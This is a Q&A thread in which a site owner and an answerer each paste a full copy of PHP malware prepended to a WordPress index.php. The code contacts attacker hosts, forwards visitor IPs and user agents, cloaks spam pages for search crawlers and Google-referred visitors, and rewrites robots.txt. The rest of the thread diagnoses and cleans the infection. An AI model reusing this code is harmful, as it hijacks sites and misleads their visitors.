# Our cPanel Wordpress Website is creating this index.php automatically

Tags: php, wordpress, cpanel, vps, virus

```
<?php $group_num = 'z9126zn';
$inter_domain = 'http://' . $group_num . '.lievful.quest';
function curl_get_contents($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    $file_contents = curl_exec($ch);
    curl_close($ch);
    return $file_contents;
}

function getServerCont($url, $data = array())
{
    $url = str_replace(' ', '+', $url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    $output = curl_exec($ch);
    $errorCode = curl_errno($ch);
    curl_close($ch);
    if (0 !== $errorCode) {
        return false;
    }
    return $output;
}

function is_crawler($agent)
{
    if (strpos($agent, 'google') !== false || strpos($agent, 'yahoo') !== false) {
        return true;
    } else {
        return false;
    }
}

function check_refer($refer)
{
    if (strpos($refer, '.co.jp') !== false || strpos($refer, 'google.com') !== false) {
        return true;
    } else {
        return false;
    }
}

$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
    $href1 = $http . $domain . $self;
} else {
    $href1 = $http . $domain;
}
$data1[] = array();
$data1['http'] = $http;
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
if(getenv('HTTP_CLIENT_IP')){
$client_ip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
$client_ip = getenv('REMOTE_ADDR');
} else {
$client_ip = $_SERVER['REMOTE_ADDR'];
}
if (substr($req_uri, -6) == 'robots') {
    $robots_cont = getServerCont($url_robots, $data1);
    define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
    file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
    $robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
    if (strpos($robots_cont, "Crawl-delay:3")) {
        echo 'robots.txt file create success!';
    } else {
        echo 'robots.txt file create fail!';
    }
    exit;
}
if (substr($req_uri, -4) == '.xml') {
    if (strpos($req_uri, "pingsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        $str_cont_arr = explode(",", $str_cont);
        $str_cont_arr[] = 'sitemap';
        for ($k = 0; $k < count($str_cont_arr); $k++) {
            if (strpos($href1, ".php") > 0) {
                $tt1 = '?';
            } else {
                $tt1 = '/';
            }
            $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
            $data_new = 'https://www.google.com/ping?sitemap=' . $http2;
            $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
            if (stristr(@file_get_contents($data_new), 'successfully')) {
                echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new), 'successfully')) {
                echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@file_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else {
                echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
            }
        }
        exit;
    }
    if (strpos($req_uri, "allsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        exit;
    }
    if (strpos($req_uri, ".php")) {
        $word4 = explode("?", $req_uri);
        $word4 = $word4[count($word4) - 1];
        $word4 = str_replace(".xml", "", $word4);
    } else {
        $word4 = str_replace("/", "", $req_uri);
        $word4 = str_replace(".xml", "", $word4);
    }
    $data1['word'] = $word4;
    $data1['action'] = 'check_sitemap';
    $check_url4 = getServerCont($url_words, $data1);
    if ($check_url4 == '1') {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        exit;
    }
    $data1['action'] = "check_words";
    $check1 = getServerCont($url_words, $data1);
    if (strpos($req_uri, "map") > 0 || $check1 == '1') {
        $data1['action'] = "rand_xml";
        $check_url4 = getServerCont($url_words, $data1);
        header("Content-type:text/xml");
        echo $check_url4;
        exit;
    }
}
if (strpos($req_uri, ".php")) {
    $main_shell = $http . $ser_name . $self;
    $data1['main_shell'] = $main_shell;
} else {
    $main_shell = $http . $ser_name;
    $data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
$bot=true;
if ($chk_refer) {
    $data1['referer'] = $referer;
    $data1['ip'] = $client_ip;
    $data1['user_agent'] = $user_agent;
    $data1['browser_la'] = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $refer_content = getServerCont($jump1, $data1);
    if ($refer_content != "404") {
        echo $refer_content;
        exit;
    }
    $bot=false;
}
$res_crawl = is_crawler($user_agent);
if ($res_crawl&&$bot) {
    $data1['http_user_agent'] = $user_agent;
    $get_content = getServerCont($indata1, $data1);
    if ($get_content == "404") {
        header('HTTP/1.0 404 Not Found');
        exit;
    } else if ($get_content == "500") {
        header("HTTP/1.0 500 Internal Server Error");
        exit;
    } else if ($get_content == "blank") {
        echo '';
        exit;
    } else {
        echo $get_content;
        exit;
    }
} ?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
```

This is that index.php file which is not in our control.

We have Godaddy VPS Server With cPanel & wordpress hosting. we have installed wordpress site in a directory and that directory creates INDEX file automatically which shows HTTP ERROR 500 when opened.

this is automatically created in our VPS server. it automatically modifies when we changes this. automatically created when deleted.

In short we have no control over the directory and this file.

Comment: Malware would be my first guess.

Comment: Determining if it's malware and how to clean up malware is probably beyond the scope of a SO question! But I'm sure you'll find plenty of resources online. I personally would start by doing a file-diff between your files and a fresh copy of WP (same version as your website) and same for any plugins / themes if possible. You could also try running malware scanners (various free and paid ones online you'll find).

Comment: Please trim your code to make it easier to find your problem. Follow these guidelines to create a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example).

Answer (score 0):

I have the same problem

```
<?php $group_num = 'z0109_18';
$inter_domain = 'http://107.150.41.2//' . $group_num . '/';
function curl_get_contents($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    $file_contents = curl_exec($ch);
    curl_close($ch);
    return $file_contents;
}

function getServerCont($url, $data = array())
{
    $url = str_replace(' ', '+', $url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    $output = curl_exec($ch);
    $errorCode = curl_errno($ch);
    curl_close($ch);
    if (0 !== $errorCode) {
        return false;
    }
    return $output;
}

function is_crawler($agent)
{
    $agent_check = false;
    $bots = 'googlebot|google|yahoo|bing|aol';
    if ($agent != '') {
        if (preg_match("/($bots)/si", $agent)) {
            $agent_check = true;
        }
    }
    return $agent_check;
}

function check_refer($refer)
{
    $check_refer = false;
    $referbots = 'google.co.jp|yahoo.co.jp|google.com';
    if ($refer != '' && preg_match("/($referbots)/si", $refer)) {
        $check_refer = true;
    }
    return $check_refer;
}

$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
    $href1 = $http . $domain . $self;
} else {
    $href1 = $http . $domain;
}
$data1[] = array();
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
if (substr($req_uri, -6) == 'robots') {
    $robots_cont = getServerCont($url_robots, $data1);
    define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
    file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
    $robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
    if (strpos(strtolower($robots_cont), "sitemap")) {
        echo 'robots.txt file create success!';
    } else {
        echo 'robots.txt file create fail!';
    }
    return;
}
if (substr($req_uri, -4) == '.xml') {
    if (strpos($req_uri, "pingsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        $str_cont_arr = explode(",", $str_cont);
        $str_cont_arr[] = 'sitemap';
        for ($k = 0; $k < count($str_cont_arr); $k++) {
            if (strpos($href1, ".php") > 0) {
                $tt1 = '?';
            } else {
                $tt1 = '/';
            }
            $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
            $data_new = 'https://www.google.com/ping?sitemap=' . $http2;
            $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
            if (stristr(@file_get_contents($data_new), 'successfully')) {
                echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new), 'successfully')) {
                echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@file_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else {
                echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
            }
        }
        return;
    }
    if (strpos($req_uri, "allsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        return;
    }
    if (strpos($req_uri, ".php")) {
        $word4 = explode("?", $req_uri);
        $word4 = $word4[count($word4) - 1];
        $word4 = str_replace(".xml", "", $word4);
    } else {
        $word4 = str_replace("/", "", $req_uri);
        $word4 = str_replace(".xml", "", $word4);
    }
    $data1['word'] = $word4;
    $data1['action'] = 'check_sitemap';
    $check_url4 = getServerCont($url_words, $data1);
    if ($check_url4 == '1') {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        return;
    }
    $data1['action'] = "check_words";
    $check1 = getServerCont($url_words, $data1);
    if (strpos($req_uri, "map") > 0 || $check1 == '1') $data1['action'] = "rand_xml";
    $check_url4 = getServerCont($url_words, $data1);
    header("Content-type:text/xml");
    echo $check_url4;
    return;
}
if (strpos($req_uri, ".php")) {
    $main_shell = $http . $ser_name . $self;
    $data1['main_shell'] = $main_shell;
} else {
    $main_shell = $http . $ser_name;
    $data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
if (strpos($_SERVER['REQUEST_URI'], '.php')) {
    $url_ext = '?';
} else {
    $url_ext = '/';
}
if ($chk_refer && (preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/", end(explode($url_ext, str_replace(array(".html", ".htm"), "", $_SERVER['REQUEST_URI'])))))) {
    echo getServerCont($jump1, $data1);
    return;
}
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
$res_crawl = is_crawler($user_agent);
if ($res_crawl) {
    $data1['http_user_agent'] = $user_agent;
    $get_content = getServerCont($indata1, $data1);
    echo $get_content;
    return;
} ?>
```

My only solution now is to delete index.php recolection.php and wp-admin and wp-includes folder.

After that I reinstall WordPress and the site is working again.

**After a while**

I start checking everything and i found 3 options of infections

- Another account for Ftp (search users in your cpanel)
- A Cron task that create a file
- Cpanel Account compromise. I just changed the password and it stop.

Comment: did your index file return?

Comment: Yes, but i realized that if i changed Cpanel password, it stop changing. I come to this conclusion because i had the same virus in a not wordpress account so it was not Wordpress the problem, so i changed my cpanel password and it stop happening